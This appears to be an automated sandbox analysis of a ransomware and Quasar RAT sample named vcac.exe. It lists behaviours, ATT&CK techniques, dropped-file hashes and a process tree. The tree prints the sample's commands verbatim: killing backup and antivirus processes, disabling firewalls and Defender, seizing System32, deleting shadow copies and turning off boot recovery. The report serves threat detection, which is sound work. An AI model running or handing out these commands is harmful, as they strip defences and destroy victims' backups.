Overview

overview

10

Static

static

10

vcac.exe

windows7-x64

10

vcac.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 05:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vcac.exe

  • Size

    24.2MB

  • MD5

    a4a742b543e52358357924c02b9490c4

  • SHA1

    6a8309fc0b3fc6b0747a2c5f89ef7a29428ba743

  • SHA256

    bfd525cf8e0cb81260ed6a80c666491b41b456f5ad389b62089346acbe90856b

  • SHA512

    fb32df097ff44c7be4549d851c8121e26c5fcd6400e8b1b095c2c38bd71214039f81be358e1e3d886a16fe92e83489ab72dacf99ef62768aca8c5aa5698010b4

  • SSDEEP

    98304:GKBbBWIgWljGxRB/LL6vc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:L4xRBjgB7j4U6gl

Score
10/10
quasarbootkitdiscoveryevasionexploitpersistenceransomwarespywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    1

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Disables Task Manager via registry modification
    evasion
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 5 IoCs
    evasion
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 42 IoCs
    evasion
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\vcac.exe
    "C:\Users\Admin\AppData\Local\Temp\vcac.exe"
    1⤵
    • Drops file in Drivers directory
    • Drops startup file
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
      2⤵
        PID:2644
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Users\Admin\AppData\Roaming\lm.exe
          lm.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Writes to the Master Boot Record (MBR)
          PID:2932
      • C:\Users\Admin\AppData\Roaming\mbr.exe
        "C:\Users\Admin\AppData\Roaming\mbr.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
          3⤵
          • Creates scheduled task(s)
          PID:1280
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1988
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:2800
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32 /grant "Admin:F"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:744
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentBrowser*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:524
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecDiveciMediaService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2328
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecJobEngine*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2136
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecManagementService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1752
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM vss*
          3⤵
          • Kills process with taskkill
          PID:2072
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sql*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1300
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM svc$*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1532
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM memtas*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1768
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1816
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2156
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM backup*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3048
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxVss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2112
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxBlr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1720
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxFWD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCVD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2984
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCIMgr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1704
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM DefWatch*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1712
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM ccEvtMgr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1972
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM SavRoam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1636
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM RTVscan*
          3⤵
          • Kills process with taskkill
          PID:2944
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBFCService*
          3⤵
          • Kills process with taskkill
          PID:2496
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Intuit.QuickBooks.FCS*
          3⤵
          • Kills process with taskkill
          PID:2932
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooBackup*
          3⤵
          • Kills process with taskkill
          PID:2708
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooIT*
          3⤵
          • Kills process with taskkill
          PID:2516
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM zhudongfangyu*
          3⤵
          • Kills process with taskkill
          PID:1280
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          PID:2300
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM stc_raw_agent*
          3⤵
          • Kills process with taskkill
          PID:2904
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VSNAPVSS*
          3⤵
          • Kills process with taskkill
          PID:2584
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBCFMonitorService*
          3⤵
          • Kills process with taskkill
          PID:2200
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamTransportSvc*
          3⤵
          • Kills process with taskkill
          PID:2588
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamDeploymentService*
          3⤵
          • Kills process with taskkill
          PID:1632
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamNFSSvc*
          3⤵
          • Kills process with taskkill
          PID:2740
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          PID:2312
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM PDVFSService*
          3⤵
          • Kills process with taskkill
          PID:1328
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecVSSProvider*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2804
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentAccelerator*
          3⤵
          • Kills process with taskkill
          PID:844
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecRPCService*
          3⤵
          • Kills process with taskkill
          PID:2948
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcrSch2Svc*
          3⤵
          • Kills process with taskkill
          PID:1820
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcronisAgent*
          3⤵
          • Kills process with taskkill
          PID:872
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CASAD2DWebSvc*
          3⤵
          • Kills process with taskkill
          PID:1952
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CAARCUpdateSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2792
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM TeamViewer*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2072
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          PID:1624
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set currentprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:548
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set domainprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:1136
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set privateprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:968
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set publicprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:1652
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
          3⤵
            PID:2936
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            3⤵
            • Modifies registry key
            PID:2192
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
            3⤵
            • Modifies registry key
            PID:1244
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionExtension .exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2440
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2900
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            3⤵
            • Interacts with shadow copies
            PID:2740
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            3⤵
              PID:2804
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
            PID:2792

          Network

          MITRE ATT&CK Enterprise v15

          Reconnaissance

          Resource Development

          Initial Access

          Execution

          Scheduled Task/Job

          1
          T1053

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Create or Modify System Process

          1
          T1543

          Windows Service

          1
          T1543.003

          Pre-OS Boot

          1
          T1542

          Bootkit

          1
          T1542.003

          Scheduled Task/Job

          1
          T1053

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Create or Modify System Process

          1
          T1543

          Windows Service

          1
          T1543.003

          Scheduled Task/Job

          1
          T1053

          Defense Evasion

          File and Directory Permissions Modification

          1
          T1222

          Indicator Removal

          2
          T1070

          File Deletion

          2
          T1070.004

          Modify Registry

          3
          T1112

          Pre-OS Boot

          1
          T1542

          Bootkit

          1
          T1542.003

          Credential Access

          Discovery

          System Information Discovery

          1
          T1082

          Lateral Movement

          Collection

          Command and Control

          Web Service

          1
          T1102

          Exfiltration

          Impact

          Defacement

          1
          T1491

          Inhibit System Recovery

          2
          T1490

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
            Filesize

            685KB

            MD5

            081d9558bbb7adce142da153b2d5577a

            SHA1

            7d0ad03fbda1c24f883116b940717e596073ae96

            SHA256

            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

            SHA512

            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

            Download Submit

          • C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll
            Filesize

            111KB

            MD5

            b59b0f6193bcc7e78a3b2fc730196be3

            SHA1

            045469fec2df2a9c75b550984a0ed32db2e9f846

            SHA256

            003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

            SHA512

            73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

            Download Submit

          • C:\Users\Admin\AppData\Roaming\boot.bin
            Filesize

            512B

            MD5

            21bbc91fb1bc04deecca398cc526b989

            SHA1

            9579ac63a28ff2e037e69f0812cbfa42532e90f6

            SHA256

            389b11feaf1aa87d1ddd9dfe5d368bc226c1da774ad5ec422b9997b29d359b48

            SHA512

            747cacb3558de0104bc0d98f2cb9b64cb495ce07bf4e55257f8073835f2c43e467ab52b676a61d889c3f8079cb20d5552d6c349da6fa6103d18da7166054abb4

            Download Submit

          • C:\Users\Admin\AppData\Roaming\lm.exe
            Filesize

            39KB

            MD5

            86e3192ad129a388e4f0ac864e84df78

            SHA1

            70a2b1422b583c2d768a6f816905bc85687ced52

            SHA256

            4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

            SHA512

            f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

            Download Submit

          • C:\Users\Admin\AppData\Roaming\lm.exe
            Filesize

            39KB

            MD5

            86e3192ad129a388e4f0ac864e84df78

            SHA1

            70a2b1422b583c2d768a6f816905bc85687ced52

            SHA256

            4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

            SHA512

            f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

            Download Submit

          • C:\Users\Admin\AppData\Roaming\mbr.exe
            Filesize

            101KB

            MD5

            00e306f18b8cc56f347f34a7ebaf7f9f

            SHA1

            2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

            SHA256

            ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

            SHA512

            2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

            Download Submit

          • C:\Users\Admin\AppData\Roaming\mbr.exe
            Filesize

            101KB

            MD5

            00e306f18b8cc56f347f34a7ebaf7f9f

            SHA1

            2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

            SHA256

            ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

            SHA512

            2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

            Download Submit

          • C:\Users\Admin\AppData\Roaming\settings.bat
            Filesize

            67B

            MD5

            a204d9e5059a5449af7af765d371d6ea

            SHA1

            cfc6f78545bdc6a1c82491500f1bacfb38bef28c

            SHA256

            d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

            SHA512

            d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

            Download Submit

          • C:\Users\Admin\AppData\Roaming\svchost.exe
            Filesize

            41KB

            MD5

            84177654d8bbd32fe8132265e7a598ec

            SHA1

            73bbb239d1449b3af2d7f53614ba456c1add4c9a

            SHA256

            af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

            SHA512

            6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

            Download Submit

          • C:\Users\Admin\AppData\Roaming\svchost.exe
            Filesize

            41KB

            MD5

            84177654d8bbd32fe8132265e7a598ec

            SHA1

            73bbb239d1449b3af2d7f53614ba456c1add4c9a

            SHA256

            af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

            SHA512

            6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

            Download Submit

          • C:\Users\Admin\AppData\Roaming\ucrtbased.dll
            Filesize

            1.4MB

            MD5

            ceeda0b23cdf173bf54f7841c8828b43

            SHA1

            1742f10b0c1d1281e5dec67a9f6659c8816738ad

            SHA256

            c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

            SHA512

            f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

            Download Submit

          • C:\Users\Admin\Music\README_SLAM_RANSOMWARE.txt
            Filesize

            2KB

            MD5

            602202efdf521b01bf505a04a08a98f5

            SHA1

            e20b3e5f139c4ae4836f4e3e9caa7dc766a62df7

            SHA256

            1c2c8d7c5dcfd818b2a55fb2f6e99d7f985bd45f2e33463464c98b210d485940

            SHA512

            95cb7e71e68eb227bf04cf50d1c409979e37371e322ac03f3d6535d7fdd095eea294075ada29723c9e231047660794ff374c8ea63489af3f2ba54eba75d11b2c

            Download Submit

          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
            Filesize

            685KB

            MD5

            081d9558bbb7adce142da153b2d5577a

            SHA1

            7d0ad03fbda1c24f883116b940717e596073ae96

            SHA256

            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

            SHA512

            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

            Download Submit

          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
            Filesize

            685KB

            MD5

            081d9558bbb7adce142da153b2d5577a

            SHA1

            7d0ad03fbda1c24f883116b940717e596073ae96

            SHA256

            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

            SHA512

            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

            Download Submit

          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
            Filesize

            685KB

            MD5

            081d9558bbb7adce142da153b2d5577a

            SHA1

            7d0ad03fbda1c24f883116b940717e596073ae96

            SHA256

            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

            SHA512

            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

            Download Submit

          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
            Filesize

            685KB

            MD5

            081d9558bbb7adce142da153b2d5577a

            SHA1

            7d0ad03fbda1c24f883116b940717e596073ae96

            SHA256

            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

            SHA512

            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

            Download Submit

          • \Users\Admin\AppData\Roaming\lm.exe
            Filesize

            39KB

            MD5

            86e3192ad129a388e4f0ac864e84df78

            SHA1

            70a2b1422b583c2d768a6f816905bc85687ced52

            SHA256

            4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

            SHA512

            f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

            Download Submit

          • \Users\Admin\AppData\Roaming\mbr.exe
            Filesize

            101KB

            MD5

            00e306f18b8cc56f347f34a7ebaf7f9f

            SHA1

            2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

            SHA256

            ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

            SHA512

            2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

            Download Submit

          • \Users\Admin\AppData\Roaming\mbr.exe
            Filesize

            101KB

            MD5

            00e306f18b8cc56f347f34a7ebaf7f9f

            SHA1

            2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

            SHA256

            ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

            SHA512

            2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

            Download Submit

          • \Users\Admin\AppData\Roaming\svchost.exe
            Filesize

            41KB

            MD5

            84177654d8bbd32fe8132265e7a598ec

            SHA1

            73bbb239d1449b3af2d7f53614ba456c1add4c9a

            SHA256

            af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

            SHA512

            6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

            Download Submit

          • \Users\Admin\AppData\Roaming\ucrtbased.dll
            Filesize

            1.4MB

            MD5

            ceeda0b23cdf173bf54f7841c8828b43

            SHA1

            1742f10b0c1d1281e5dec67a9f6659c8816738ad

            SHA256

            c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

            SHA512

            f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

            Download Submit

          • \Users\Admin\AppData\Roaming\vcruntime140d.dll
            Filesize

            111KB

            MD5

            b59b0f6193bcc7e78a3b2fc730196be3

            SHA1

            045469fec2df2a9c75b550984a0ed32db2e9f846

            SHA256

            003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

            SHA512

            73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

            Download Submit

          • memory/2364-3-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2364-432-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2364-1-0x00000000012A0000-0x0000000002ADC000-memory.dmp

            Filesize

            24.2MB

            Download

          • memory/2364-0-0x00000000748B0000-0x0000000074F9E000-memory.dmp

            Filesize

            6.9MB

            Download

          • memory/2364-2-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2364-106-0x00000000748B0000-0x0000000074F9E000-memory.dmp

            Filesize

            6.9MB

            Download

          • memory/2364-434-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2364-188-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2364-414-0x0000000009E20000-0x0000000009ED0000-memory.dmp

            Filesize

            704KB

            Download

          • memory/2440-431-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2440-427-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2440-433-0x000000006D740000-0x000000006DCEB000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2440-428-0x000000006D740000-0x000000006DCEB000-memory.dmp

            Filesize

            5.7MB

            Download

          • memory/2440-424-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

            Download

          • memory/2440-429-0x0000000002410000-0x0000000002450000-memory.dmp

